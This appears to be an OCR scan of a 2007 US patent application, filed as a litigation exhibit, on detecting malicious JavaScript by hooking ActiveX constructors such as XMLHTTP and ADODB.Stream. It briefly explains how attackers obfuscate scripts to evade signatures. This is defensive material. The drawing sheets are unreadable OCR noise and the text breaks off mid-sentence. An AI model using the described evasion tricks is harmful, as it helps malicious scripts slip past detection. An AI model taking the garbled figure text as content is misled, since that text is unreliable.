(19) United States
`
`(12) Patent Application Publication (10) Pub. No.: US 2007/0113282 A1
`Ross
`(43) Pub. Date:
`May 17, 2007
`
`US 20070l13282Al
`
`(54) SYSTEMS AND METHODS FOR DETECTING
`AND DISABLING MALICIOUS SCRIPT
`CODE
`
`(76)
`
`Inventor: Robert F. Ross, Rancho Santa
`Margarita, CA (US)
`
`Correspondence Address:
`MACPHERSON KWOK CHEN & HEID LLP
`2033 GATEWAY PLACE
`SUITE 400
`
`SAN JOSE, CA 95110 (US)
`
`(21)
`
`Appl. No.:
`
`11/281,839
`
`(22)
`
`Filed:
`
`Nov. 17, 2005
`
`Publication Classification
`
`(51)
`
`Int. Cl.
`(2006.01)
`G06F 12/14
`(2006.01)
`G06F 11/00
`(52) U.S.Cl.
`............................................... ..726/22; 726/25
`
`(57)
`
`ABSTRACT
`
`In accordance with at least one embodiment of the present
`invention, a device for receiving and processing data content
`having at least one original function call includes a hook
`script generator and a script processing engine. The hook
`script generator is configured to generate a hook script
`having at least one hook function. Each hook function is
`configured to supersede a corresponding original function.
`The script processing engine is configured to receive and
`process a combination of the hook script and the data
`content. The hook function corresponding to the data content
`original function is executed when the original function is
`called. The hook function provides a run-time detection and
`control of the data content processing.
`
`CLIENT
`
`202
`
`SERVER
`
`204
`
`
`
`220
`DISPLAY
`
`
`
`
`
`
`
`
`WEB SERVER
`
`WEB PAGE #1
`WEB PAGE #2
`*
`
`230
`TRANSCEIVER
`
`232
`PROCESSOR
`
`250
`
`252
`
`234
`PROCESSOR
`MEMORY
`
`254
`
`*
`
`PROCESSOR
`*
`
`WEB PAGE #N
`MEMORY
`
`
`
`224
`
`
`
`
`
`
`PROCESSING
`ENGINE (WEB
`BROWSER)
`
`
`
`DETECTION ENGINE
`
`242
`SCRIPT INJECTOR
`
`(BROWSER PLUG-IN)
`
`
`
`244
`HOOK SCRIPT GENERATOR
`
`
`
`246
`COMMUNICATION OBJECT
`
`
`
`
`‘V 200
`
`SYIVIANTEC
`
`Exhibit 1003
`
`Page 1
`
` Exhibit 1003 Page 1
`
` SYMANTEC
`
`

`
`Patent Application Publication May 17, 2007 Sheet 1 of 6
`
`US 2007/0113282 A1
`
`mmimm
`
`oofi
`
`mm>mmmmma
`
`*Num0/Emm;Emoimm?
`
`**
`
`znmo/Emm;
`
`we~
`
`wofi
`
`IHEWMOHWEIHOHM
`
`./2:
`
`FZWEU
`
`35.55
`
`o~_
`
`mmmaommmm?
`
`vm_
`
`SYIVIANTEC
`
`Exhibit 1003
`
`Page 2
`
` Exhibit 1003 Page 2
`
` SYMANTEC
`
`
`

`
`Patent Application Publication May 17, 2007 Sheet 2 of 6
`
`US 2007/0113282 Al
`
`2%moimma
`
`>.mO_2m:2
`
`*
`
`*
`
`mmimmmma
`
`S.mo§mma
`
`*QmO<¢mm?
`
`
`
`MOmmm—UO&m>MO$_mE2
`
`Emmommmoofi EE E
`
`ommmm>Eomz<E><4._mE
`
`zmiam
`
`ENSm
`
`ezmiu
`
`ommONN
`
`com
`J
`
`NUHLN
`
`ozammuofi
`
`
`
`mm?mz_ozm
`
`Emmaomm
`
`
`
`mzfizmzofiomemo
`
`MOFUEZHSE8
`
`
`
`A253;mmmaommv
`
`Sm
`
`
`
`mo,~<zmzmoEaomMOO:
`
`
`
`eumamoZO:.<n:ZDS:2OO
`
`SYIVIANTEC
`
`Exhibit 1003
`
`Page 3
`
` Exhibit 1003 Page 3
`
` SYMANTEC
`
`
`
`
`
`
`
`

`
`Patent Application Publication May 17, 2007 Sheet 3 of 6
`
`US 2007/0113282 A1
`
`
`
`A:EEomm>mm..Howw:w:m_Hmaom
`
`anew_§w:o\
`
`MUHM
`
`SYIVIANTEC
`
`Exhibit 1003
`
`Page 4
`
` Exhibit 1003 Page 4
`
` SYMANTEC
`
`

`
`Patent Application Publication May 17, 2007 Sheet 4 of 6
`
`US 2007/0113282 A1
`
`
`
`
`
`couosfl
`
`
`
`
`
`9E32canSofie3&8;nEL.Eu_EX.tomo._o_Eoomooovowoowoomoocomv\\VCoooiomcoofioboooEOQENNAE
`
`
`
`
`
`AofifiwxocoEEE_w€25Stowxoomcoomoocow\
`
`
`
`A:a_sm§£.,uow§w§_SE8
`
`€%_oxo>_5<uoxss
`
`
`
`cocoonooomxooaobcsoom89:o:H\\AoSo:3ovOX<_mooE38
`
`
`
`
`
`
`
`H2_§_3o:_AOX<_mo§ooEOAEXNAEBo:E38VnE.EqEx.rsmos_E_.
`
`
`
`VasA
`
`
`ooo:owmxooso
`
` btsoom\\WGEE.BovoooBOXo>:o<_oov_ooEconocflA
`
`Ev
`
`mHo0_.£OvA®>_w0<U0¥OOW—Hooo3OXo>uo.A
`
`acom__§m:o\
`
`AS309
`
`
`
`A:Etomn>m?nowm:w:2Hndmumv
`
`Sm
`
`SYIVIANTEC
`
`Exhibit 1003
`
`Page 5
`
` Exhibit 1003 Page 5
`
` SYMANTEC
`
`

`
`Patent Application Publication May 17, 2007 Sheet 5 of 6
`
`US 2007/0113282 A1
`
`mmOH><Emm
`
`
`
`
`
`BmHmUmZH4BmmUBmHmUm
`
`m0ZOHHUZDm
`
`mOBODmBmZOU
`
`
`
`BZm2mO<QmmmEH2HEBmOEUDmBmZOUmOBUDmBmZOO
`
`
`
`EBH3mOBUDmHmZOUMOZOHHUZDmMOZOHBUZDm
`
`
`
`MOZOHBUZDmQ¢ZHOHmOHIEBZmZmO¢Hmmm
`
`
`
`M39mU<AmmmOEMUZmMmmmmQm>¢wBMZflmB¢mmU
`
`mom«omNow
`
`mQm¢mHQMO.%mHQOZM39WmQmQA<U
`
`
`BmHmUmHIEMEDUWXMBUMWQOZflmH<mmU
`HUMHMOBMZWEBIBH3BWZMIRZWEBBZmE%i%Qmmm
`
`
`4mflOZH>¢EmmDWHmHOOZ
`\3OQH<OHW¢BmH<OmHmOHUDmEmZOOZOBJTJFWZOU
`
`
`
`
`
`m
`
`SYIVIANTEC
`
`Exhibit 1003
`
`Page 6
`
` Exhibit 1003 Page 6
`
` SYMANTEC
`
`
`
`

`
`Patent Application Publication May 17, 2007 Sheet 6 of 6
`
`US 2007/0113282 A1
`
`oflo
`
`N_m3.5.5
`
`ezmpzou
`
`So\.N8
`
`<55
`
`oz$
`
`meumao
`
`omzzmomza
`
`
`
`avzofiozamoiamzmc
`
`MOOIEaomMOO:
`
`me<d2m:
`
`<63
`
`NS
`
`zoE<o_z:22ou
`
`
`eomao
`
`mmmaommvV—OMO._iDm=.7:.._.n=MUm
`
`
`
`
`
`E569Sfimoozammoofi
`
`08Xe
`
`>:dm<mmz5>
`
`pzm2mmm_mm<
`
`Q0HMm~::<zo_m
`
`mm<m<e<o
`
`mg
`
`
`
`mmzcmzazm
`
`Emmaomm
`
`SYIVIANTEC
`
`Exhibit 1003
`
`Page 7
`
` Exhibit 1003 Page 7
`
` SYMANTEC
`
`
`
`
`

`
`US 2007/0113282 A1
`
`May 17, 2007
`
`SYSTEMS AND METHODS FOR DETECTING AND
`DISABLING MALICIOUS SCRIPT CODE
`
`TECHNICAL FIELD
`
`[0001] The present invention relates generally to client
`and server network traffic, and more particularly,
`for
`example, to detecting and disabling malicious script code.
`
`RELATED ART
`
`[0002] Many computer applications today utilize com-
`mand scripts to perform a variety of tasks. A command
`script, or script code, typically is a computer file containing
`a sequence of text commands and arguments that conform to
`a particular scripting language convention or standard. An
`interpreter
`typically parses
`(i.e.
`reads)
`the script and
`executes (interprets) the script commands in a sequential
`manner so that commands at the beginning of a script are
`parsed and executed before later commands are parsed.
`
`In contrast, compiled code is typically generated
`[0003]
`from one or more source code computer files containing a
`sequence of text commands and arguments that conform to
`a particular programming language, where the entire
`sequence of text and arguments are parsed before any
`commands are executed. Compiled programs require a sepa-
`rate compiling process where the source code is converted to
`a non-human readable machine code that may be directly
`executed on a targeted computer platform. Script languages
`typically take longer to interpret and execute than a com-
`piled language program that is merely executed after com-
`pilation, but scripts can be very useful for shorter programs
`where the slower interpreter speed offsets the compile time
`overhead for the compiled code.
`
`Java is the name of a general-purpose program-
`[0004]
`ming language that is well suited for use with clients and
`servers on the World Wide Web (WWW). Smaller Java
`programs or applications are called Java applets and can be
`downloaded from a web server and run on a local computer
`by a java-enabled web browser such as Microsoft’s Internet
`Explorer (IE) or Netscape’s Navigator. JavaScript is the
`name of a common scripting language that was developed
`originally by Netscape Communications and Sun Microsys-
`tems for use in Internet browser applications. JavaScript can
`be considered a client-side scripting language that
`is
`executed by an Internet browser, sometimes known as a web
`client because it connects to a web server to access web
`
`pages. In reference to FIG. 1, a traditional client-server
`system 100 is shown including a client network device 102
`(client) and a server network device 104 (server) that can
`communicate with each other over a communications net-
`
`work 108 such as the Internet. Client 102 may be connected
`to Internet 108 through a switched-packet connection 110,
`while server 104 may be connected to Internet 108 through
`another switched-packet connection 112 where Client 102
`and server 104 may exchange message packets comprising
`network data.
`
`[0005] Client 102 may include a display 120 such as a
`video monitor, a keyboard 122, and a web browser 124.
`Server 104 may include a web server 160 configured to
`provide a plurality of web pages in a download mode to a
`requesting device such as client 102. Conversely, client 102
`may also upload information onto web server 160. Web-
`browser 124 and web-server 160 may each be an application
`
`program running on a suitably programmed computer sys-
`tem. Web browser 124 may load a web page written in a
`Hypertext Markup Language (HTML) that contains a por-
`tion of embedded JavaScript code. The browser typically
`includes a built-in interpreter that reads and executes the
`JavaScript code. JavaScript may be used to automatically
`change formatted information on the requested web page,
`cause a linked page to appear in another browser window,
`and/or cause text and/or graphical images to change during
`a mouse rollover, for example.
`[0006] The number of client side JavaScript attacks is
`increasing against Java-enabled web browsers such as
`Microsoft’s Internet Explorer and/or Netscape’s Navigator
`applications. Many problems have been found with
`improper classification of web content into security zones.
`Problems vary from cross-site scripting to the installation of
`new programs on the exploited host. This proliferation of
`JavaScript attacks results in pervasive problems spanning
`financial fraud to spyware installation. Some anti-spyware
`and anti-adware manufacturers attempted to introduce
`scripts to block browser pop-up ads, but
`this approach
`quickly became obsolete, as the sophistication of modern
`spyware/adware has increased.
`[0007] Anti-virus and security companies have attempted
`to strike back, but the usual response is to create signatures
`for known pieces of malicious program code including
`JavaScript. A signature is like a fingerprint of a particular
`portion of a program or portion of code that uniquely
`identifies this code. To avoid detection, some attackers
`obfuscate their scripts so that the signatures do not match the
`resulting code. Another method of obfuscation includes
`string concatenation of the string fragments “ADO”, “DB.”,
`and “Stream” that may be concatenated into the string
`“ADODB.Stream”. Alternatively, some attackers have used
`a Microsoft Script Encoder (screnc.exe) tool to pass the
`entire script through a text-encoding cipher that replaces the
`original text of the script file. In this manner, script encoding
`requires a script viewer to go through a specific decoding
`process to retrieve the original script code.
`[0008] Script-based code execution has many security
`vulnerabilities and traditional approaches to resolve these
`security problems have not been sufficiently effective. Sig-
`nature based detection is one of the strongest tools available
`other than simply setting a kill bit in the registry, but it is far
`too simple to circumvent signature based checks. While
`decoders have emerged to reverse the actions of screnc.exe,
`string concatenation and other simple programmatic obfus-
`cation techniques have an infinite number of variations with
`which signatures carmot always keep up. In view of these
`issues and others, there remains a need in the art for methods
`and systems that reliably detect malicious script code with-
`out relying on string and/or signature detection.
`SUMMARY
`
`in
`Systems and methods are disclosed herein,
`[0009]
`accordance with one or more embodiments of the present
`invention related to validating script code, such as JavaS-
`cript, in a way that checks the final result of the code and
`doesn’t simply look for strings within the code block. A
`hook-based detection engine, for example running as Java-
`Script, may catch the actual method calls regardless of the
`formatting of the code text, thus providing a far greater
`ability to detect script-based attacks than traditional security
`systems and methods.
`SYIVIANTEC
`
`Exhibit 1003
`
`Page 8
`
` Exhibit 1003 Page 8
`
` SYMANTEC
`
`

`
`US 2007/0113282 A1
`
`May 17, 2007
`
`[0010] More specifically, in accordance with an embodi-
`ment of the present invention, a device for receiving and
`processing data content having at least one original function
`call includes a hook script generator and a script processing
`engine. The hook script generator is configured to generate
`a hook script having at least one hook function. Each hook
`function is configured to supersede a corresponding original
`function. The script processing engine is configured to
`receive and process a combination of the hook script and the
`data content. The hook function corresponding to the data
`content original function is executed when the original
`function is called. The hook function provides a run-time
`detection and control of the data content processing.
`
`In accordance with another embodiment of the
`[0011]
`present invention, a web client device includes a transceiver,
`a detection engine, and a script processing engine. The
`transceiver is configured to receive a data content from a
`network. The data content includes at least one original
`function call. The detection engine includes a hook script
`generator configured to generate a hook script including at
`least one hook function. Each hook function is configured to
`supersede a corresponding original function. The script
`processing engine is configured to receive and process the
`hook script and the data content. The hook function corre-
`sponding to the data content original function is executed
`when the original function is called. The hook function
`provides a run-time detection and control of the data content
`processing.
`
`In accordance with yet another embodiment of the
`[0012]
`invention, a method of processing data content
`present
`comprising the operations of generating a hook script having
`at least one hook function where each hook function is
`
`configured to supersede a corresponding original function,
`loading the hook script
`into a script processing engine
`configured to call and execute one or more hook and original
`functions, loading data content having at least one original
`function into the script processing engine, and executing a
`hook function when a corresponding original function is
`called in the data content.
`
`[0013] A computer readable medium on which is stored a
`computer program for executing instructions, comprising
`the operations of generating a hook script having at least one
`hook function where each hook function is configured to
`supersede a corresponding original function,
`loading the
`hook script into a script processing engine configured to call
`and execute one or more hook and original
`functions,
`loading data content having at least one original function
`into the script processing engine, and executing a hook
`function when a corresponding original function is called in
`the data content.
`
`[0014] The scope of the present invention is defined by the
`claims, which are incorporated into this section by reference.
`A more complete understanding of embodiments of the
`present invention will be alforded to those skilled in the art,
`as well as a realization of additional advantages thereof, by
`a consideration of the following detailed description. Ref-
`erence will be made to the appended sheets of drawings that
`will first be described briefly.
`
`BRIEF DESCRIPTION OF THE DRAWINGS
`
`[0015] FIG. 1 shows a traditional client-server system
`including a client network device and a server network
`
`device that can communicate with each other over a com-
`munications network such as the Internet.
`
`FIG. 2 shows an exemplary client-server system
`[0016]
`including a client network device (client) and a server
`network device (server) according to an embodiment of the
`present invention.
`
`FIG. 3 shows an example of original script code
`[0017]
`received as HTTP content, for example, downloading a web
`page from a web server.
`
`FIG. 4 shows a combined script including a gen-
`[0018]
`erated hook script and the original script code shown in FIG.
`3, according to an embodiment of the present invention.
`
`FIG. 5 shows a script validation flow according to
`[0019]
`an embodiment of the present invention.
`
`FIG. 6 shows a data flow block diagram illustrating
`[0020]
`both a structure and a process for detecting and selectively
`disabling potentially malicious script code according to an
`embodiment of the present invention.
`
`[0021] Embodiments of the present invention and their
`advantages are best understood by referring to the detailed
`description that follows. It should be appreciated that like
`reference numerals are used to identify like elements illus-
`trated in one or more of the figures.
`
`DETAILED DESCRIPTION
`
`in
`Systems and methods are disclosed herein,
`[0022]
`accordance with one or more embodiments of the present
`invention, to detect and disable potentially malicious script
`code by the activation of a detection engine that can detect
`and control the behavior of suspected malicious script code
`to limit adverse program behaviors while promoting desir-
`able program behaviors.
`
`FIG. 2 shows an exemplary client-server system
`[0023]
`200 including a client network device 202 (client) and a
`server network device 204 (server) according to an embodi-
`ment of the present invention. Client 202 and server 204 can
`communicate with each other over a communications net-
`
`work 208 such as the Internet to exchange information
`including web content comprising text, image, audio, and/or
`video data. Client 202, may be considered a web client 202,
`and may include a display 220 for displaying graphical
`images and/or producing sound to a user constituting a user
`output device, a data entry device 222 for receiving data
`input from a user constituting a user input device, and/or a
`script processing engine 224, such as a web browser 224, for
`receiving the web content and translating the web content
`into one or more client actions. A client action may convey
`output data to a user include displaying or outputting the text
`data, image data, video data, interactive control data, and/or
`the audio data. In this manner, web browser 224 provides a
`graphical user interface (GUI) to locate and display web
`pages in order to interactively access text, program, image,
`as well as sound data available through the World Wide Web
`(WWW). The terms script processing engine 224 and web
`browser 224 may be used somewhat interchangeably since
`a web browser typically includes a script processing engine.
`Data entry device 222 may include a keyboard for text entry
`and/or a pointing device for point-and-click information
`entry by a user. Alternatively, data entry device 222 may be
`SYIVIANTEC
`Exhibit 1003
`Page 9
`
` Exhibit 1003 Page 9
`
` SYMANTEC
`
`

`
`US 2007/0113282 Al
`
`May 17, 2007
`
`any combination of sensors to detect data entry by a user.
`Display 220 and keyboard/pointing device 222 comprise a
`user interface (UI).
`
`[0024] Client 202 may include a transceiver 230 for send-
`ing and receiving messages on network 210, a processor 232
`for executing computations and operations to move and/or
`transform data within client 202 and control client opera-
`tions, and a processor memory 234 for storing and retrieving
`data relevant
`to client operations. Transceiver 230 may
`include a device such as a network interface card (NIC)
`and/or
`related software for providing communications
`between client 202 and network 210. Processor 232 may
`include one or more suitably programmed microprocessors,
`while processor memory 234 may be any data storage and
`retrieval system including any combination of a Random
`Access Memory (RAM), a Read Only Memory (ROM), a
`register file, a disc drive including magnetic media, and/or
`an optical memory device as a computer readable medium
`on which is stored a computer program for executing
`instructions. Some portion of processor memory 234 may be
`removable from client 202. Web browser 224 may be
`implemented as an application program or collection of
`programs running at least partially on a computer such as
`processor 232.
`
`[0025] To detect potentially malicious script code, client
`202 includes a hook-based detection engine 240 that is
`configured to catch actual script method calls regardless of
`the formatting of the code text. Detection engine 240 may be
`implemented by a script, such as a JavaScript, executing on
`a computer such as processor 232. The JavaScript language
`uses late binding which refers to the linking or calling of a
`process, routine, or object at runtime based on current
`conditions. Since JavaScript uses late binding, it is possible
`to replace or modify arguments and functions, thus effec-
`tively replacing objects by changing their class constructor
`function. For the purposes of this disclosure, a constructor is
`a function that is used to instantiate a new object and returns
`the newly created instance of that object.
`
`In one embodiment, detection engine 240 includes
`[0026]
`a script injector 242, a hook script generator 244, and/or a
`communication object 246. Script injector 242 may intercept
`incoming data content, such as HTTP data, and introduce the
`incoming data to script processing engine 224. Incoming
`data may be, for example, a requested web page delivered
`over network 208. Script injector 242 may be implemented
`as a browser plug-in, such as a Multipurpose Internet Mail
`Extensions (MIME) plug-in, for web browser 224. Hook
`script generator 244 creates new functions, including con-
`structor functions, which replace the standard JavaScript
`functions. Alternatively, hook script generator 244 may
`create a generic hook script olf-line for archive or reading in
`to a remote client through a network 208 or other delivery
`means. In this manner, a script manufacturer may design and
`distribute a hook script for use by a plurality of client
`end-users. The distributed hook script may be read in to a
`web browser prior to reading in any web page in order to
`provide run-time detection and control of the data content
`processing for the remote client. In another embodiment,
`some portion or all of detection engine 240 may be physi-
`cally located away from client 202. Some portion or all of
`detection engine 240 may be moved onto another platform
`termed a third device, and may be implemented as another
`client device (not shown), an auxiliary device operationally
`
`connected to client 202 (not shown), and/or a network
`device that intercepts messages up to an including all traffic
`between connection networks 208 and 210. In one example,
`the script injection and generation could be accomplished by
`the third device.
`
`[0027] Communication object 246 is configured to pro-
`vide a run-time exchange of messages (data) between vari-
`ous processes or threads for programs running on processor
`232.
`In this manner,
`the output of a particular hooked
`function and/or routine may be directed towards a particular
`message receiver, such as another process or a device within
`client 202 or connected to client 202 via network 210. In one
`
`example, communication object 246 can relay data between
`the script code executing on script processing engine 224
`and another process or service including a virus scarming or
`a security management service.
`
`[0028] One example of this type of security management
`service is a network security application Blink® produced
`by eEye Digital Security of Aliso Viejo, Calif. Blink®
`provides an endpoint vulnerability solution that addresses
`security challenges by preventing a successful attack. The
`Blink service typically runs in parallel with detection engine
`240 and uses one or more communication objects 246 to
`relay data back and forth between detection engine 240 and
`the Blink service.
`
`Script injector 242 can be a Multipurpose Internet
`[0029]
`Mail Extensions (MIME) filter plug-in for use with a tradi-
`tional browser such as Microsoft’s Internet Explorer (IE)
`and/or Netscape’s Netscape Navigator. Script injector 242
`may also be considered a “pluggable” MIME filter since it
`may be implemented as a browser plug-in or extension.
`MIME capability permits the formatting of non-ASCII
`(American Standard Code for Information Interchange)
`messages so that they can be sent over a communications
`link such as the Internet 208. Many e-mail clients and
`browsers support various MIME types that allow them to
`send and receive graphics, audio files, video files, and use
`character sets other than standard ASCII. Further, MIME
`enabled browsers can typically display or output files that
`are not in HTML format. MIME is continually evolving as
`a standard and includes various types with many differences.
`For reference, an early MIME protocol is defined by an
`Internet Engineering Task Force (IETF) request for com-
`ments (RFC) No. 2045 “Multipurpose Internet Mail Exten-
`sions”, also denoted IETF-RFC2045. A new version called
`S/MIME supports encrypted messages and is referenced in
`IETF-RFC2633 “S/MIME Version 3 Message Specifica-
`tion”. Script injector 242 is configured to inject the JavaS-
`cript that hooks the critical functions and methods before
`any other HTML in a loading page. In this manner, the script
`filter injects the JavaScript created by script generator 244.
`For the purposes of this disclosure, a method is associated
`with a class in an obj ect-oriented programming environment
`and is analogous to a procedure, function, or routine that is
`executed when a method object receives a message. Further,
`a method argument is an input to a method. A constructor
`defines actions that are performed when an object is created.
`A class definition can contain zero or more constructors.
`
`FIG. 3 shows an example of original script code
`[0030]
`302 received as data (HTTP) content, for example, down-
`loading a web page from a web server. In one example, an
`original constructor can be an ActiveXObject ( ) function
`SYIVIANTEC
`Exhibit 1003
`Page 10
`
` Exhibit 1003 Page 10
`
` SYMANTEC
`
`

`
`US 2007/0113282 A1
`
`May 17, 2007
`
`that enables and returns a reference to an automation object.
`In this example, there are two exemplary actions that the
`Microsoft.XMLHTTP ActiveXObject can perform; method
`calls defined as Open and SaveToFile. A client computer can
`use a Microsoft.XMLHTTP object
`to send an arbitrary
`HTTP request,
`receive the response, and/or have the
`Microsoft extensible markup language O(ML) document
`object model (DOM) parse that response.
`
`[0031] FIG. 4 shows an example ofa combined script 402
`including a generated hook script 404 and original script
`code 302 shown in FIG. 3, according to an embodiment of
`the present invention. Although shown as a single, combined
`script 402, generated hook script 404 and original script
`code 302 may be introduced, or injected, into script pro-
`cessing engine 618 individually by any means as long as a
`hook script function corresponding to an original script
`function is processed first. The combination of hook script
`404 and original script 302 into combined script 402 is not
`intended as a limitation. In this example, since the requested
`automation object in the script is “Microsoft.XMLHTTP”,
`then instead of returning an automation object directly a new
`object can be created as a wrapper for the automation object.
`All properties and methods of the XMLHTTP object are
`present in the new wrapper object, and any method calls may
`be passed on to the original automation object. In this
`manner, validity checks can be performed to validate
`method arguments before allowing the function call. With
`XMLHTTP, the wrapper could filter out downloads refer-
`enced by a file path that includes a uniform resource locator
`(URL) on an untrusted hosts. Also, a wrapper object around
`ADODB.Stream could allow validation of the file path
`before allowing a SaveToFile or other method to execute.
`This could prevent files from being written into the Win-
`dows system directory, for example, while still allowing use
`of the object for other purposes.
`
`[0032] Code generation will be used to simplify the pro-
`cess of creating new wrappers for one or more ActiveXOb-
`jects. The input to the code generator consists of a descrip-
`tion of the object to be wrapped. Some portions of this input
`include the name of the automation object, the properties of
`the object, and the methods of the object. Since properties
`carmot be hooked, they may be loaded and/or set before
`and/or after calls to various methods. Each method shall be
`
`marked with whether it should set properties before the real
`method call or load them after a method call completes.
`Some more exotic methods may have custom code provided
`for them instead of a simple description of how to proxy a
`specific method call or class. These custom methods will be
`the key check points for the detection engine. Examples
`include the SaveToFile method of ADODB.Stream and the
`
`Open method of Microsoft.XMLHTTP.
`
`[0033] FIG. 5 shows an exemplary script validation flow
`500 according to an embodiment of the present invention.
`Flow 500 shows a process of hooking one or more functions
`in the received content and selectively disabling potentially
`malicious methods or function by validating the method or
`function arguments and/or run-time conditions before allow-
`ing the execution of a potentially malicious function call.
`Flow 500 includes the operations of creating 502 a new
`replacement function or constructor, saving 504 a reference
`to the original function or constructor, and replacing 506 the
`original function or constructor with a new replacement
`function or constructor that acts as a wrapper for the original
`
`function or constructor. Flow 500 continues in operation 508
`depending on whether the new replacement (hook) function
`is a constructor. If the new replacement function is a
`constructor, flow 500 continues with creating 510 a new
`wrapper object when called, and executing 512 the modified
`script with the new object behaving as a gateway to allow,
`modify, or disable certain script behaviors. Operation 512
`may occur without operation 510 in cases where the hooked
`function is a simple non-constructor function. These allowed
`or inhibited behaviors can include particular script com-
`mands, script command argument combinations, and/or
`method, argument, and property combinations.
`
`FIG. 6 shows an exemplary data flow block dia-
`[0034]
`gram 600 illustrating both a structure and a process for
`detecting and selectively disabling potentially malicious
`script code according to an embodiment of the present
`invention. As a structure, data (HTTP) content 602, such as
`downloaded from a web page,
`is received by a script
`injector/filter (browser plug-in) 604 which is an exemplary
`embodiment of script filter 242 (FIG. 2). Data content 602
`may include a script program with one or more original
`functions for execution on the receiving client. Ahook script
`generator 606 may receive some portion or all of data
`content 602 and supply a generated script code including
`one or more hook functions configured to replace corre-
`sponding original functions. Hook script generator 606 is an
`exemplary embodiment of script generator 244 (FIG. 2).
`This process of substituting an original function or method
`with a filtered function can be denoted instantiating a
`“hooked” processes. Alternatively, data content 602 that
`does not include a script and/or an original function corre-
`sponding to a hook function would simply be received and
`processed without modification.
`
`[0035] Hook script generator 606 may receive input from
`one or more simple hook templates 610, one or more
`predetermined hook functions and objects 612, and/or object
`template data 614. Using one or more of these as input, hook
`script generator 606 produces a hook script, such as a
`JavaScript output that may consist of hook functions, new
`objects that will be used as replacements when the appro-
`priate constructor is invoked, and/or new constructors that
`will return the hooked objects in place of the standard
`objects. These hooks are installed before any other script on
`the web page loads, ensuring that any script provided as a
`part of the data content 602, such as a web page, will call the
`new hooked functions. The generated (hooked) script code
`supplied to script filter 604 may be passed to a script
`processing engine 618 may be implemented as a stand-alone
`computer program running as an executed script. Altema-
`tively, script processing engine 618 may be included as an
`operational portion of a web browser, which may be imple-
`mented as an application program running on a computer
`such as processor 232 (FIG. 2). Script processing engine 618
`may communicate to a script relay interface 622 by passing
`messages through a commu